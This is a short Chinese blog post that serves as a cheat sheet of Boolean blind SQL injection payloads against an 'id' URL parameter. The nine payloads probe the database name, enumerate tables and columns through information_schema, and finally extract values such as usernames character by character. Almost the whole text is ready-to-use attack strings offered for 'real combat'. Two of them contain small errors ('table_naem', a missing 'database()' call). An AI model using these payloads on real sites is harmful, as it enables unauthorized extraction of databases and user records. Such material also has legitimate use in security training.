首页 > 其他分享 >布尔盲注常用语句

布尔盲注常用语句

时间:2024-12-05 22:02:31浏览次数:6  
标签:语句 users database table 布尔 盲注 id select schema

1.查询当前数据库长度

?id=1 and (length (database()))>3

2.查询当前数据库名称

?id=1 and (substr (database(),1,1))="a"

3.查询当前数据库下表的数量

?id=1 and (select count(*) from information_schema.tables where table_schema=database)>3

4.查询当前数据库下第一张表的长度(配合爆破可查询其他表)

?id=1 and (length((select table_naem from information_schema.tables where table_schema=database() limit 0,1)))>3

5.查询当前数据库下第一张表的表名第一位(可配合爆破)

?id=1 and(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))="a"

6.查询当前数据库下,users表中字段数(users不固定)

?id=1 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name="users")=3

 7.查询当前数据库下users表中第一字段的长度(0可更改)

?id=1 and length((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 0,1))>3

8.查询当前数据库下users表中第一个字段的第一位

?id=1 and substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 0,1),1,1)="a"

9.得到字段后就可以查询数据了,这里指定的是username字段,实战中可更改,注意区分大小写

?id=1 and substr((select username from users limit 0,1),1,1)="d"

标签:语句,users,database,table,布尔,盲注,id,select,schema
From: https://blog.csdn.net/winter_1235/article/details/144222036

相关文章

  • 【Java】Switch语句、循环语句(for、while、do...while)
    Switch语句:针对某个表达式的值进行判断,从而决定执行哪一段代码语法格式:switch(表达式){      case目标值1:              执行语句1                      break;       case目标值2:   ......
  • 08-选择语句
    08-选择语句如果你好好学习,拿一个好offer。如果你不好好学习,回家卖红薯。【注】这就是选择!!!#define_CRT_SECURE_NO_WARNINGS1#include<stdio.h>intmain(){ intinput=0; //输入变量 printf("加入C语言学习:>"); /*1:好好学习,0:不好好学习*/ printf("你要好......
  • 09-循环语句
    09-循环语句有些事必须一直做。【比如】日复一日的学习。写每天3W行代码,找一个好工作。#define_CRT_SECURE_NO_WARNINGS1#include<stdio.h>intmain(){ intline=0; //输入变量 while(line<30000) { printf("写代码:%d\n",line); line++; } if(......
  • PbootCMS中IF条件语句支持哪些运算符?
    在PbootCMS中,IF条件语句支持多种运算符,用于进行条件判断和逻辑运算。这些运算符可以帮助你在模板中实现复杂的逻辑判断。以下是PbootCMSIF条件语句支持的运算符及其用法:比较运算符:>:大于>=:大于等于!=:不等于==:等于<=:小于等于<:小于逻辑运算符:&&:逻辑与||:逻辑或......
  • c语言:语句详解
    算法的概念及特点在说c语句前我们先了解一下算法的概念及特点广义的说、为解决一个问题采取的方法和有限的步骤,就称为“算法”数据结构+算法=程序数据结构:对数的描述算法:操作的步骤就比如把大象放进冰箱里需要几步:对我们程序员来说把大象放进冰箱里只需要三步1......
  • 常用SQL语句总结
    SQL介绍SQL是一种结构化的数据库查询和程序设计的编程语言,用于存取数据以及查询、更新和管理数据库。SQL分为4大类:数据定义语言(DDL)、数据操纵语言(DML)、数据查询语言(DQL)和数据控制语言(DCL)数据定义语言(DDL)是对数据库和表进行定义,关键字有create/alter/drop/truncate......
  • MySQL语句学习第二篇_数据库
    专栏记录MySQL的学习,感谢大家观看。本章的专栏......
  • #C01L06P01. C01.L06.复合语句、数值交换、三个数的最值与排序.复合语句
    例1:运行下列程序,输入5,观察运行结果并思考程序是怎样运行的。#include<bits/stdc++.h>usingnamespacestd;intmain(){ intn,a=0,b=0,c=0; cin>>n; if(n<0) a=a+2; b=b+2; c=c+2; cout<<a<<""<<b<<""<<c; re......
  • 表达式和语句有什么区别?如何把语句转换为表达式?
    在前端开发中,表达式和语句是JavaScript的基本组成部分,它们之间有着关键的区别:表达式(Expression):计算结果:表达式会产生一个值。你可以把它想象成一个计算公式,最终会得到一个结果。可以被求值:JavaScript引擎会对表达式进行求值,并返回一个结果。可以嵌入到语句中:表......
  • C语言中 switch-case`语句的优劣分析:全面深入探讨
    在C语言中,switch-case语句是一种常用的多分支选择结构,它允许根据一个变量的不同值执行不同的代码块。与传统的if-else语句相比,switch-case语句在某些场景下具有明显的优势,但也存在一些不足之处。本文将全面深入地探讨switch-case语句的优点和缺点,并通过具体示例进行......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99